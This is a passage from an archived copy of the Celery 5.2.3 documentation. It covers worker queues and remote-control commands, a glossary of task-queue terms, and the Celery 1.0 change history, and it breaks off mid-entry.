:option:`celery worker -Q` option: .. code-block:: console $ celery -A proj worker -Q hipri You may specify multiple queues by using a comma-separated list. For example, you can make the worker consume from both the default queue and the ``hipri`` queue, where the default queue is named ``celery`` for historical reasons: .. code-block:: console $ celery -A proj worker -Q hipri,celery The order of the queues doesn't matter as the worker will give equal weight to the queues. To learn more about routing, including taking use of the full power of AMQP routing, see the :ref:`Routing Guide `. Remote Control ============== If you're using RabbitMQ (AMQP), Redis, or Qpid as the broker then you can control and inspect the worker at runtime. For example you can see what tasks the worker is currently working on: .. code-block:: console $ celery -A proj inspect active This is implemented by using broadcast messaging, so all remote control commands are received by every worker in the cluster. You can also specify one or more workers to act on the request using the :option:`--destination ` option. This is a comma-separated list of worker host names: .. code-block:: console $ celery -A proj inspect active --destination=celery@example.com If a destination isn't provided then every worker will act and reply to the request. The :program:`celery inspect` command contains commands that don't change anything in the worker; it only returns information and statistics about what's going on inside the worker. 
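The same information is also available programmatically through the control API; here's a brief sketch, assuming the ``app`` instance from the example project:

.. code-block:: python

    from proj.celery import app

    inspector = app.control.inspect()       # query every worker in the cluster
    # inspector = app.control.inspect(['worker1@example.com'])  # or just some of them

    print(inspector.active())       # tasks currently being executed
    print(inspector.registered())   # task names each worker has registered
    print(inspector.stats())        # per-worker statistics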
For a list of inspect commands you can execute: .. code-block:: console $ celery -A proj inspect --help Then there's the :program:`celery control` command, which contains commands that actually change things in the worker at runtime: .. code-block:: console $ celery -A proj control --help For example you can force workers to enable event messages (used for monitoring tasks and workers): .. code-block:: console $ celery -A proj control enable_events When events are enabled you can then start the event dumper to see what the workers are doing: .. code-block:: console $ celery -A proj events --dump or you can start the curses interface: .. code-block:: console $ celery -A proj events when you're finished monitoring you can disable events again: .. code-block:: console $ celery -A proj control disable_events The :program:`celery status` command also uses remote control commands and shows a list of online workers in the cluster: .. code-block:: console $ celery -A proj status You can read more about the :program:`celery` command and monitoring in the :ref:`Monitoring Guide `. Timezone ======== All times and dates, internally and in messages use the UTC timezone. When the worker receives a message, for example with a countdown set it converts that UTC time to local time. If you wish to use a different timezone than the system timezone then you must configure that using the :setting:`timezone` setting: .. code-block:: python app.conf.timezone = 'Europe/London' Optimization ============ The default configuration isn't optimized for throughput. By default, it tries to walk the middle way between many short tasks and fewer long tasks, a compromise between throughput and fair scheduling. If you have strict fair scheduling requirements, or want to optimize for throughput then you should read the :ref:`Optimizing Guide `. What to do now? =============== Now that you have read this document you should continue to the :ref:`User Guide `. There's also an :ref:`API reference ` if you're so inclined. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/resources.rst0000664000175000017500000000020400000000000021472 0ustar00asifasif00000000000000.. _resources: =========== Resources =========== .. contents:: :local: :depth: 2 .. include:: ../includes/resources.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/glossary.rst0000664000175000017500000001054000000000000016222 0ustar00asifasif00000000000000.. _glossary: Glossary ======== .. glossary:: :sorted: acknowledged Workers acknowledge messages to signify that a message has been handled. Failing to acknowledge a message will cause the message to be redelivered. Exactly when a transaction is considered a failure varies by transport. In AMQP the transaction fails when the connection/channel is closed (or lost), but in Redis/SQS the transaction times out after a configurable amount of time (the ``visibility_timeout``). ack Short for :term:`acknowledged`. early acknowledgment Task is :term:`acknowledged` just-in-time before being executed, meaning the task won't be redelivered to another worker if the machine loses power, or the worker instance is abruptly killed, mid-execution. Configured using :setting:`task_acks_late`. 
late acknowledgment Task is :term:`acknowledged` after execution (both if successful, or if the task is raising an error), which means the task will be redelivered to another worker in the event of the machine losing power, or the worker instance being killed mid-execution. Configured using :setting:`task_acks_late`. early ack Short for :term:`early acknowledgment` late ack Short for :term:`late acknowledgment` ETA "Estimated Time of Arrival", in Celery and Google Task Queue, etc., used as the term for a delayed message that should not be processed until the specified ETA time. See :ref:`calling-eta`. request Task messages are converted to *requests* within the worker. The request information is also available as the task's :term:`context` (the ``task.request`` attribute). calling Sends a task message so that the task function is :term:`executed ` by a worker. kombu Python messaging library used by Celery to send and receive messages. billiard Fork of the Python multiprocessing library containing improvements required by Celery. executing Workers *execute* task :term:`requests `. apply Originally a synonym to :term:`call ` but used to signify that a function is executed by the current process. context The context of a task contains information like the id of the task, it's arguments and what queue it was delivered to. It can be accessed as the tasks ``request`` attribute. See :ref:`task-request-info` idempotent Idempotence is a mathematical property that describes a function that can be called multiple times without changing the result. Practically it means that a function can be repeated many times without unintended effects, but not necessarily side-effect free in the pure sense (compare to :term:`nullipotent`). Further reading: https://en.wikipedia.org/wiki/Idempotent nullipotent describes a function that'll have the same effect, and give the same result, even if called zero or multiple times (side-effect free). A stronger version of :term:`idempotent`. reentrant describes a function that can be interrupted in the middle of execution (e.g., by hardware interrupt or signal), and then safely called again later. Reentrancy isn't the same as :term:`idempotence ` as the return value doesn't have to be the same given the same inputs, and a reentrant function may have side effects as long as it can be interrupted; An idempotent function is always reentrant, but the reverse may not be true. cipater Celery release 3.1 named after song by Autechre (http://www.youtube.com/watch?v=OHsaqUr_33Y) prefetch multiplier The :term:`prefetch count` is configured by using the :setting:`worker_prefetch_multiplier` setting, which is multiplied by the number of pool slots (threads/processes/greenthreads). `prefetch count` Maximum number of unacknowledged messages a consumer can hold and if exceeded the transport shouldn't deliver any more messages to that consumer. See :ref:`optimizing-prefetch-limit`. pidbox A process mailbox, used to implement remote control commands. ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5997531 celery-5.2.3/docs/history/0000775000175000017500000000000000000000000015326 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-1.0.rst0000664000175000017500000016136700000000000020321 0ustar00asifasif00000000000000.. 
_changelog-1.0: =============================== Change history for Celery 1.0 =============================== .. contents:: :local: .. _version-1.0.6: 1.0.6 ===== :release-date: 2010-06-30 09:57 a.m. CEST :release-by: Ask Solem * RabbitMQ 1.8.0 has extended their exchange equivalence tests to include `auto_delete` and `durable`. This broke the AMQP backend. If you've already used the AMQP backend this means you have to delete the previous definitions: .. code-block:: console $ camqadm exchange.delete celeryresults or: .. code-block:: console $ python manage.py camqadm exchange.delete celeryresults .. _version-1.0.5: 1.0.5 ===== :release-date: 2010-06-01 02:36 p.m. CEST :release-by: Ask Solem .. _v105-critical: Critical -------- * :sig:`INT`/:kbd:`Control-c` killed the pool, abruptly terminating the currently executing tasks. Fixed by making the pool worker processes ignore :const:`SIGINT`. * Shouldn't close the consumers before the pool is terminated, just cancel the consumers. See issue #122. * Now depends on :pypi:`billiard` >= 0.3.1 * worker: Previously exceptions raised by worker components could stall start-up, now it correctly logs the exceptions and shuts down. * worker: Prefetch counts was set too late. QoS is now set as early as possible, so the worker: can't slurp in all the messages at start-up. .. _v105-changes: Changes ------- * :mod:`celery.contrib.abortable`: Abortable tasks. Tasks that defines steps of execution, the task can then be aborted after each step has completed. * :class:`~celery.events.EventDispatcher`: No longer creates AMQP channel if events are disabled * Added required RPM package names under `[bdist_rpm]` section, to support building RPMs from the sources using :file:`setup.py`. * Running unit tests: :envvar:`NOSE_VERBOSE` environment var now enables verbose output from Nose. * :func:`celery.execute.apply`: Pass log file/log level arguments as task kwargs. See issue #110. * celery.execute.apply: Should return exception, not :class:`~billiard.einfo.ExceptionInfo` on error. See issue #111. * Added new entries to the :ref:`FAQs `: * Should I use retry or acks_late? * Can I call a task by name? .. _version-1.0.4: 1.0.4 ===== :release-date: 2010-05-31 09:54 a.m. CEST :release-by: Ask Solem * Changelog merged with 1.0.5 as the release was never announced. .. _version-1.0.3: 1.0.3 ===== :release-date: 2010-05-15 03:00 p.m. CEST :release-by: Ask Solem .. _v103-important: Important notes --------------- * Messages are now acknowledged *just before* the task function is executed. This is the behavior we've wanted all along, but couldn't have because of limitations in the multiprocessing module. The previous behavior wasn't good, and the situation worsened with the release of 1.0.1, so this change will definitely improve reliability, performance and operations in general. For more information please see http://bit.ly/9hom6T * Database result backend: result now explicitly sets `null=True` as `django-picklefield` version 0.1.5 changed the default behavior right under our noses :( See: http://bit.ly/d5OwMr This means those who created their Celery tables (via ``syncdb`` or ``celeryinit``) with :pypi:`django-picklefield`` versions >= 0.1.5 has to alter their tables to allow the result field to be `NULL` manually. MySQL: .. code-block:: sql ALTER TABLE celery_taskmeta MODIFY result TEXT NULL PostgreSQL: .. 
code-block:: sql ALTER TABLE celery_taskmeta ALTER COLUMN result DROP NOT NULL * Removed `Task.rate_limit_queue_type`, as it wasn't really useful and made it harder to refactor some parts. * Now depends on carrot >= 0.10.4 * Now depends on billiard >= 0.3.0 .. _v103-news: News ---- * AMQP backend: Added timeout support for `result.get()` / `result.wait()`. * New task option: `Task.acks_late` (default: :setting:`CELERY_ACKS_LATE`) Late ack means the task messages will be acknowledged **after** the task has been executed, not *just before*, which is the default behavior. .. note:: This means the tasks may be executed twice if the worker crashes in mid-execution. Not acceptable for most applications, but desirable for others. * Added Crontab-like scheduling to periodic tasks. Like a cronjob, you can specify units of time of when you'd like the task to execute. While not a full implementation of :command:`cron`'s features, it should provide a fair degree of common scheduling needs. You can specify a minute (0-59), an hour (0-23), and/or a day of the week (0-6 where 0 is Sunday, or by names: ``sun, mon, tue, wed, thu, fri, sat``). Examples: .. code-block:: python from celery.schedules import crontab from celery.decorators import periodic_task @periodic_task(run_every=crontab(hour=7, minute=30)) def every_morning(): print('Runs every morning at 7:30a.m') @periodic_task(run_every=crontab(hour=7, minute=30, day_of_week='mon')) def every_monday_morning(): print('Run every monday morning at 7:30a.m') @periodic_task(run_every=crontab(minutes=30)) def every_hour(): print('Runs every hour on the clock (e.g., 1:30, 2:30, 3:30 etc.).') .. note:: This a late addition. While we have unit tests, due to the nature of this feature we haven't been able to completely test this in practice, so consider this experimental. * `TaskPool.apply_async`: Now supports the `accept_callback` argument. * `apply_async`: Now raises :exc:`ValueError` if task args isn't a list, or kwargs isn't a tuple (Issue #95). * `Task.max_retries` can now be `None`, which means it will retry forever. * ``celerybeat``: Now reuses the same connection when publishing large sets of tasks. * Modified the task locking example in the documentation to use `cache.add` for atomic locking. * Added experimental support for a *started* status on tasks. If `Task.track_started` is enabled the task will report its status as "started" when the task is executed by a worker. The default value is `False` as the normal behavior is to not report that level of granularity. Tasks are either pending, finished, or waiting to be retried. Having a "started" status can be useful for when there are long running tasks and there's a need to report which task is currently running. The global default can be overridden by the :setting:`CELERY_TRACK_STARTED` setting. * User Guide: New section `Tips and Best Practices`. Contributions welcome! .. _v103-remote-control: Remote control commands ----------------------- * Remote control commands can now send replies back to the caller. Existing commands has been improved to send replies, and the client interface in `celery.task.control` has new keyword arguments: `reply`, `timeout` and `limit`. Where reply means it will wait for replies, timeout is the time in seconds to stop waiting for replies, and limit is the maximum number of replies to get. By default, it will wait for as many replies as possible for one second. 
* rate_limit(task_name, destination=all, reply=False, timeout=1, limit=0) Worker returns `{'ok': message}` on success, or `{'failure': message}` on failure. >>> from celery.task.control import rate_limit >>> rate_limit('tasks.add', '10/s', reply=True) [{'worker1': {'ok': 'new rate limit set successfully'}}, {'worker2': {'ok': 'new rate limit set successfully'}}] * ping(destination=all, reply=False, timeout=1, limit=0) Worker returns the simple message `"pong"`. >>> from celery.task.control import ping >>> ping(reply=True) [{'worker1': 'pong'}, {'worker2': 'pong'}] * revoke(destination=all, reply=False, timeout=1, limit=0) Worker simply returns `True`. >>> from celery.task.control import revoke >>> revoke('419e46eb-cf6a-4271-86a8-442b7124132c', reply=True) [{'worker1': True}, {'worker2': True}] * You can now add your own remote control commands! Remote control commands are functions registered in the command registry. Registering a command is done using :meth:`celery.worker.control.Panel.register`: .. code-block:: python from celery.task.control import Panel @Panel.register def reset_broker_connection(state, **kwargs): state.consumer.reset_connection() return {'ok': 'connection re-established'} With this module imported in the worker, you can launch the command using `celery.task.control.broadcast`:: >>> from celery.task.control import broadcast >>> broadcast('reset_broker_connection', reply=True) [{'worker1': {'ok': 'connection re-established'}}, {'worker2': {'ok': 'connection re-established'}}] **TIP** You can choose the worker(s) to receive the command by using the `destination` argument:: >>> broadcast('reset_broker_connection', destination=['worker1']) [{'worker1': {'ok': 'connection re-established'}}] * New remote control command: `dump_reserved` Dumps tasks reserved by the worker, waiting to be executed:: >>> from celery.task.control import broadcast >>> broadcast('dump_reserved', reply=True) [{'myworker1': []}] * New remote control command: `dump_schedule` Dumps the worker's currently registered ETA schedule. These are tasks with an `eta` (or `countdown`) argument waiting to be executed by the worker. >>> from celery.task.control import broadcast >>> broadcast('dump_schedule', reply=True) [{'w1': []}, {'w3': []}, {'w2': ['0. 2010-05-12 11:06:00 pri0 <TaskRequest ... kwargs:'{'page': 2}'>']}, {'w4': ['0. 2010-05-12 11:00:00 pri0 <TaskRequest ... kwargs:'{'page': 1}'>', '1. 2010-05-12 11:12:00 pri0 <TaskRequest ... kwargs:'{'page': 3}'>']}] .. _v103-fixes: Fixes ----- * Mediator thread no longer blocks for more than 1 second. With rate limits enabled and when there was a lot of remaining time, the mediator thread could block shutdown (and potentially block other jobs from coming in). * Remote rate limits weren't properly applied (Issue #98). * Now handles exceptions with Unicode messages correctly in `TaskRequest.on_failure`. * Database backend: `TaskMeta.result`: default value should be `None` not empty string. .. _version-1.0.2: 1.0.2 ===== :release-date: 2010-03-31 12:50 p.m. CET :release-by: Ask Solem * Deprecated: :setting:`CELERY_BACKEND`, please use :setting:`CELERY_RESULT_BACKEND` instead. * We now use a custom logger in tasks. This logger supports task magic keyword arguments in formats. The default format for tasks (:setting:`CELERYD_TASK_LOG_FORMAT`) now includes the id and the name of tasks so the origin of task log messages can easily be traced.
Example output:: [2010-03-25 13:11:20,317: INFO/PoolWorker-1] [tasks.add(a6e1c5ad-60d9-42a0-8b24-9e39363125a4)] Hello from add To revert to the previous behavior you can set:: CELERYD_TASK_LOG_FORMAT = """ [%(asctime)s: %(levelname)s/%(processName)s] %(message)s """.strip() * Unit tests: Don't disable the django test database tear down, instead fixed the underlying issue which was caused by modifications to the `DATABASE_NAME` setting (Issue #82). * Django Loader: New config :setting:`CELERY_DB_REUSE_MAX` (max number of tasks to reuse the same database connection) The default is to use a new connection for every task. We'd very much like to reuse the connection, but a safe number of reuses isn't known, and we don't have any way to handle the errors that might happen, which may even be database dependent. See: http://bit.ly/94fwdd * worker: The worker components are now configurable: :setting:`CELERYD_POOL`, :setting:`CELERYD_CONSUMER`, :setting:`CELERYD_MEDIATOR`, and :setting:`CELERYD_ETA_SCHEDULER`. The default configuration is as follows: .. code-block:: python CELERYD_POOL = 'celery.concurrency.processes.TaskPool' CELERYD_MEDIATOR = 'celery.worker.controllers.Mediator' CELERYD_ETA_SCHEDULER = 'celery.worker.controllers.ScheduleController' CELERYD_CONSUMER = 'celery.worker.consumer.Consumer' The :setting:`CELERYD_POOL` setting makes it easy to swap out the multiprocessing pool with a threaded pool, or how about a twisted/eventlet pool? Consider the competition for the first pool plug-in started! * Debian init-scripts: Use `-a` not `&&` (Issue #82). * Debian init-scripts: Now always preserves `$CELERYD_OPTS` from the `/etc/default/celeryd` and `/etc/default/celerybeat`. * celery.beat.Scheduler: Fixed a bug where the schedule wasn't properly flushed to disk if the schedule hadn't been properly initialized. * ``celerybeat``: Now syncs the schedule to disk when receiving the :sig:`SIGTERM` and :sig:`SIGINT` signals. * Control commands: Make sure keywords arguments aren't in Unicode. * ETA scheduler: Was missing a logger object, so the scheduler crashed when trying to log that a task had been revoked. * ``management.commands.camqadm``: Fixed typo `camqpadm` -> `camqadm` (Issue #83). * PeriodicTask.delta_resolution: wasn't working for days and hours, now fixed by rounding to the nearest day/hour. * Fixed a potential infinite loop in `BaseAsyncResult.__eq__`, although there's no evidence that it has ever been triggered. * worker: Now handles messages with encoding problems by acking them and emitting an error message. .. _version-1.0.1: 1.0.1 ===== :release-date: 2010-02-24 07:05 p.m. CET :release-by: Ask Solem * Tasks are now acknowledged early instead of late. This is done because messages can only be acknowledged within the same connection channel, so if the connection is lost we'd've to re-fetch the message again to acknowledge it. This might or might not affect you, but mostly those running tasks with a really long execution time are affected, as all tasks that's made it all the way into the pool needs to be executed before the worker can safely terminate (this is at most the number of pool workers, multiplied by the :setting:`CELERYD_PREFETCH_MULTIPLIER` setting). We multiply the prefetch count by default to increase the performance at times with bursts of tasks with a short execution time. If this doesn't apply to your use case, you should be able to set the prefetch multiplier to zero, without sacrificing performance. .. 
note:: A patch to :mod:`multiprocessing` is currently being worked on, this patch would enable us to use a better solution, and is scheduled for inclusion in the `2.0.0` release. * The worker now shutdowns cleanly when receiving the :sig:`SIGTERM` signal. * The worker now does a cold shutdown if the :sig:`SIGINT` signal is received (:kbd:`Control-c`), this means it tries to terminate as soon as possible. * Caching of results now moved to the base backend classes, so no need to implement this functionality in the base classes. * Caches are now also limited in size, so their memory usage doesn't grow out of control. You can set the maximum number of results the cache can hold using the :setting:`CELERY_MAX_CACHED_RESULTS` setting (the default is five thousand results). In addition, you can re-fetch already retrieved results using `backend.reload_task_result` + `backend.reload_taskset_result` (that's for those who want to send results incrementally). * The worker now works on Windows again. .. warning:: If you're using Celery with Django, you can't use `project.settings` as the settings module name, but the following should work: .. code-block:: console $ python manage.py celeryd --settings=settings * Execution: `.messaging.TaskPublisher.send_task` now incorporates all the functionality apply_async previously did. Like converting countdowns to ETA, so :func:`celery.execute.apply_async` is now simply a convenient front-end to :meth:`celery.messaging.TaskPublisher.send_task`, using the task classes default options. Also :func:`celery.execute.send_task` has been introduced, which can apply tasks using just the task name (useful if the client doesn't have the destination task in its task registry). Example: >>> from celery.execute import send_task >>> result = send_task('celery.ping', args=[], kwargs={}) >>> result.get() 'pong' * `camqadm`: This is a new utility for command-line access to the AMQP API. Excellent for deleting queues/bindings/exchanges, experimentation and testing: .. code-block:: console $ camqadm 1> help Gives an interactive shell, type `help` for a list of commands. When using Django, use the management command instead: .. code-block:: console $ python manage.py camqadm 1> help * Redis result backend: To conform to recent Redis API changes, the following settings has been deprecated: * `REDIS_TIMEOUT` * `REDIS_CONNECT_RETRY` These will emit a `DeprecationWarning` if used. A `REDIS_PASSWORD` setting has been added, so you can use the new simple authentication mechanism in Redis. * The redis result backend no longer calls `SAVE` when disconnecting, as this is apparently better handled by Redis itself. * If `settings.DEBUG` is on, the worker now warns about the possible memory leak it can result in. * The ETA scheduler now sleeps at most two seconds between iterations. * The ETA scheduler now deletes any revoked tasks it might encounter. As revokes aren't yet persistent, this is done to make sure the task is revoked even though, for example, it's currently being hold because its ETA is a week into the future. * The `task_id` argument is now respected even if the task is executed eagerly (either using apply, or :setting:`CELERY_ALWAYS_EAGER`). * The internal queues are now cleared if the connection is reset. * New magic keyword argument: `delivery_info`. Used by retry() to resend the task to its original destination using the same exchange/routing_key. 
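To illustrate, a task written against the 1.0-era magic keyword argument API could read the new argument like this (a minimal sketch; the task name and the printed fields are assumptions, not part of the original entry):

.. code-block:: python

    from celery.decorators import task

    @task()
    def refresh_feed(feed_url, **kwargs):
        # `delivery_info` arrives as a magic keyword argument and holds
        # the exchange/routing_key the message was delivered with, which
        # retry() reuses when resending the task.
        info = kwargs.get('delivery_info', {})
        print('delivered via exchange=%r routing_key=%r' % (
            info.get('exchange'), info.get('routing_key')))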
* Events: Fields wasn't passed by `.send()` (fixes the UUID key errors in celerymon) * Added `--schedule`/`-s` option to the worker, so it is possible to specify a custom schedule filename when using an embedded ``celerybeat`` server (the `-B`/`--beat`) option. * Better Python 2.4 compatibility. The test suite now passes. * task decorators: Now preserve docstring as `cls.__doc__`, (was previously copied to `cls.run.__doc__`) * The `testproj` directory has been renamed to `tests` and we're now using `nose` + `django-nose` for test discovery, and `unittest2` for test cases. * New pip requirements files available in :file:`requirements`. * TaskPublisher: Declarations are now done once (per process). * Added `Task.delivery_mode` and the :setting:`CELERY_DEFAULT_DELIVERY_MODE` setting. These can be used to mark messages non-persistent (i.e., so they're lost if the broker is restarted). * Now have our own `ImproperlyConfigured` exception, instead of using the Django one. * Improvements to the Debian init-scripts: Shows an error if the program is not executable. Does not modify `CELERYD` when using django with virtualenv. .. _version-1.0.0: 1.0.0 ===== :release-date: 2010-02-10 04:00 p.m. CET :release-by: Ask Solem .. _v100-incompatible: Backward incompatible changes ----------------------------- * Celery doesn't support detaching anymore, so you have to use the tools available on your platform, or something like :pypi:`supervisor` to make ``celeryd``/``celerybeat``/``celerymon`` into background processes. We've had too many problems with the worker daemonizing itself, so it was decided it has to be removed. Example start-up scripts has been added to the `extra/` directory: * Debian, Ubuntu, (:command:`start-stop-daemon`) `extra/debian/init.d/celeryd` `extra/debian/init.d/celerybeat` * macOS :command:`launchd` `extra/mac/org.celeryq.celeryd.plist` `extra/mac/org.celeryq.celerybeat.plist` `extra/mac/org.celeryq.celerymon.plist` * Supervisor (http://supervisord.org) `extra/supervisord/supervisord.conf` In addition to `--detach`, the following program arguments has been removed: `--uid`, `--gid`, `--workdir`, `--chroot`, `--pidfile`, `--umask`. All good daemonization tools should support equivalent functionality, so don't worry. Also the following configuration keys has been removed: `CELERYD_PID_FILE`, `CELERYBEAT_PID_FILE`, `CELERYMON_PID_FILE`. * Default worker loglevel is now `WARN`, to enable the previous log level start the worker with `--loglevel=INFO`. * Tasks are automatically registered. This means you no longer have to register your tasks manually. You don't have to change your old code right away, as it doesn't matter if a task is registered twice. If you don't want your task to be automatically registered you can set the `abstract` attribute .. code-block:: python class MyTask(Task): abstract = True By using `abstract` only tasks subclassing this task will be automatically registered (this works like the Django ORM). If you don't want subclasses to be registered either, you can set the `autoregister` attribute to `False`. Incidentally, this change also fixes the problems with automatic name assignment and relative imports. So you also don't have to specify a task name anymore if you use relative imports. * You can no longer use regular functions as tasks. This change was added because it makes the internals a lot more clean and simple. However, you can now turn functions into tasks by using the `@task` decorator: .. 
code-block:: python from celery.decorators import task @task() def add(x, y): return x + y .. seealso:: :ref:`guide-tasks` for more information about the task decorators. * The periodic task system has been rewritten to a centralized solution. This means the worker no longer schedules periodic tasks by default, but a new daemon has been introduced: `celerybeat`. To launch the periodic task scheduler you have to run ``celerybeat``: .. code-block:: console $ celerybeat Make sure this is running on one server only, if you run it twice, all periodic tasks will also be executed twice. If you only have one worker server you can embed it into the worker like this: .. code-block:: console $ celeryd --beat # Embed celerybeat in celeryd. * The supervisor has been removed. This means the `-S` and `--supervised` options to `celeryd` is no longer supported. Please use something like http://supervisord.org instead. * `TaskSet.join` has been removed, use `TaskSetResult.join` instead. * The task status `"DONE"` has been renamed to `"SUCCESS"`. * `AsyncResult.is_done` has been removed, use `AsyncResult.successful` instead. * The worker no longer stores errors if `Task.ignore_result` is set, to revert to the previous behavior set :setting:`CELERY_STORE_ERRORS_EVEN_IF_IGNORED` to `True`. * The statistics functionality has been removed in favor of events, so the `-S` and --statistics` switches has been removed. * The module `celery.task.strategy` has been removed. * `celery.discovery` has been removed, and it's ``autodiscover`` function is now in `celery.loaders.djangoapp`. Reason: Internal API. * The :envvar:`CELERY_LOADER` environment variable now needs loader class name in addition to module name, For example, where you previously had: `"celery.loaders.default"`, you now need `"celery.loaders.default.Loader"`, using the previous syntax will result in a `DeprecationWarning`. * Detecting the loader is now lazy, and so isn't done when importing `celery.loaders`. To make this happen `celery.loaders.settings` has been renamed to `load_settings` and is now a function returning the settings object. `celery.loaders.current_loader` is now also a function, returning the current loader. So:: loader = current_loader needs to be changed to:: loader = current_loader() .. _v100-deprecations: Deprecations ------------ * The following configuration variables has been renamed and will be deprecated in v2.0: * ``CELERYD_DAEMON_LOG_FORMAT`` -> ``CELERYD_LOG_FORMAT`` * ``CELERYD_DAEMON_LOG_LEVEL`` -> ``CELERYD_LOG_LEVEL`` * ``CELERY_AMQP_CONNECTION_TIMEOUT`` -> ``CELERY_BROKER_CONNECTION_TIMEOUT`` * ``CELERY_AMQP_CONNECTION_RETRY`` -> ``CELERY_BROKER_CONNECTION_RETRY`` * ``CELERY_AMQP_CONNECTION_MAX_RETRIES`` -> ``CELERY_BROKER_CONNECTION_MAX_RETRIES`` * ``SEND_CELERY_TASK_ERROR_EMAILS`` -> ``CELERY_SEND_TASK_ERROR_EMAILS`` * The public API names in celery.conf has also changed to a consistent naming scheme. * We now support consuming from an arbitrary number of queues. To do this we had to rename the configuration syntax. If you use any of the custom AMQP routing options (queue/exchange/routing_key, etc.), you should read the new FAQ entry: :ref:`faq-task-routing`. The previous syntax is deprecated and scheduled for removal in v2.0. * `TaskSet.run` has been renamed to `TaskSet.apply_async`. `TaskSet.run` has now been deprecated, and is scheduled for removal in v2.0. .. v100-news: News ---- * Rate limiting support (per task type, or globally). * New periodic task system. * Automatic registration. 
* New cool task decorator syntax. * worker: now sends events if enabled with the `-E` argument. Excellent for monitoring tools, one is already in the making (https://github.com/celery/celerymon). Current events include: :event:`worker-heartbeat`, task-[received/succeeded/failed/retried], :event:`worker-online`, :event:`worker-offline`. * You can now delete (revoke) tasks that's already been applied. * You can now set the hostname the worker identifies as using the `--hostname` argument. * Cache backend now respects the :setting:`CELERY_TASK_RESULT_EXPIRES` setting. * Message format has been standardized and now uses ISO-8601 format for dates instead of datetime. * worker now responds to the :sig:`SIGHUP` signal by restarting itself. * Periodic tasks are now scheduled on the clock. That is, `timedelta(hours=1)` means every hour at :00 minutes, not every hour from the server starts. To revert to the previous behavior you can set `PeriodicTask.relative = True`. * Now supports passing execute options to a TaskSets list of args. Example: .. code-block:: pycon >>> ts = TaskSet(add, [([2, 2], {}, {'countdown': 1}), ... ([4, 4], {}, {'countdown': 2}), ... ([8, 8], {}, {'countdown': 3})]) >>> ts.run() * Got a 3x performance gain by setting the prefetch count to four times the concurrency, (from an average task round-trip of 0.1s to 0.03s!). A new setting has been added: :setting:`CELERYD_PREFETCH_MULTIPLIER`, which is set to `4` by default. * Improved support for webhook tasks. `celery.task.rest` is now deprecated, replaced with the new and shiny `celery.task.http`. With more reflective names, sensible interface, and it's possible to override the methods used to perform HTTP requests. * The results of task sets are now cached by storing it in the result backend. .. _v100-changes: Changes ------- * Now depends on :pypi:`carrot` >= 0.8.1 * New dependencies: :pypi:`billiard`, :pypi:`python-dateutil`, :pypi:`django-picklefield`. * No longer depends on python-daemon * The `uuid` distribution is added as a dependency when running Python 2.4. * Now remembers the previously detected loader by keeping it in the :envvar:`CELERY_LOADER` environment variable. This may help on windows where fork emulation is used. * ETA no longer sends datetime objects, but uses ISO 8601 date format in a string for better compatibility with other platforms. * No longer sends error mails for retried tasks. * Task can now override the backend used to store results. * Refactored the ExecuteWrapper, `apply` and :setting:`CELERY_ALWAYS_EAGER` now also executes the task callbacks and signals. * Now using a proper scheduler for the tasks with an ETA. This means waiting ETA tasks are sorted by time, so we don't have to poll the whole list all the time. * Now also imports modules listed in :setting:`CELERY_IMPORTS` when running with django (as documented). * Log level for stdout/stderr changed from INFO to ERROR * ImportErrors are now properly propagated when auto-discovering tasks. * You can now use `celery.messaging.establish_connection` to establish a connection to the broker. * When running as a separate service the periodic task scheduler does some smart moves to not poll too regularly. If you need faster poll times you can lower the value of :setting:`CELERYBEAT_MAX_LOOP_INTERVAL`. * You can now change periodic task intervals at runtime, by making `run_every` a property, or subclassing `PeriodicTask.is_due`. 
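A possible shape for the runtime-interval change mentioned in the previous item (a sketch only; the class name and the five-minute interval are invented for illustration):

.. code-block:: python

    from datetime import timedelta

    from celery.task import PeriodicTask


    class RefreshFeeds(PeriodicTask):

        @property
        def run_every(self):
            # Evaluated each time the scheduler checks the task,
            # so the interval can be changed at runtime.
            return timedelta(minutes=5)

        def run(self, **kwargs):
            pass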
* The worker now supports control commands enabled through the use of a broadcast queue, you can remotely revoke tasks or set the rate limit for a task type. See :mod:`celery.task.control`. * The services now sets informative process names (as shown in `ps` listings) if the :pypi:`setproctitle` module is installed. * :exc:`~@NotRegistered` now inherits from :exc:`KeyError`, and `TaskRegistry.__getitem__`+`pop` raises `NotRegistered` instead * You can set the loader via the :envvar:`CELERY_LOADER` environment variable. * You can now set :setting:`CELERY_IGNORE_RESULT` to ignore task results by default (if enabled, tasks doesn't save results or errors to the backend used). * The worker now correctly handles malformed messages by throwing away and acknowledging the message, instead of crashing. .. _v100-bugs: Bugs ---- * Fixed a race condition that could happen while storing task results in the database. .. _v100-documentation: Documentation ------------- * Reference now split into two sections; API reference and internal module reference. .. _version-0.8.4: 0.8.4 ===== :release-date: 2010-02-05 01:52 p.m. CEST :release-by: Ask Solem * Now emits a warning if the --detach argument is used. --detach shouldn't be used anymore, as it has several not easily fixed bugs related to it. Instead, use something like start-stop-daemon, :pypi:`supervisor` or :command:`launchd` (macOS). * Make sure logger class is process aware, even if running Python >= 2.6. * Error emails are not sent anymore when the task is retried. .. _version-0.8.3: 0.8.3 ===== :release-date: 2009-12-22 09:43 a.m. CEST :release-by: Ask Solem * Fixed a possible race condition that could happen when storing/querying task results using the database backend. * Now has console script entry points in the :file:`setup.py` file, so tools like :pypi:`zc.buildout` will correctly install the programs ``celeryd`` and ``celeryinit``. .. _version-0.8.2: 0.8.2 ===== :release-date: 2009-11-20 03:40 p.m. CEST :release-by: Ask Solem * QOS Prefetch count wasn't applied properly, as it was set for every message received (which apparently behaves like, "receive one more"), instead of only set when our wanted value changed. .. _version-0.8.1: 0.8.1 ================================= :release-date: 2009-11-16 05:21 p.m. CEST :release-by: Ask Solem .. _v081-very-important: Very important note ------------------- This release (with carrot 0.8.0) enables AMQP QoS (quality of service), which means the workers will only receive as many messages as it can handle at a time. As with any release, you should test this version upgrade on your development servers before rolling it out to production! .. _v081-important: Important changes ----------------- * If you're using Python < 2.6 and you use the multiprocessing backport, then multiprocessing version 2.6.2.1 is required. * All AMQP_* settings has been renamed to BROKER_*, and in addition AMQP_SERVER has been renamed to BROKER_HOST, so before where you had:: AMQP_SERVER = 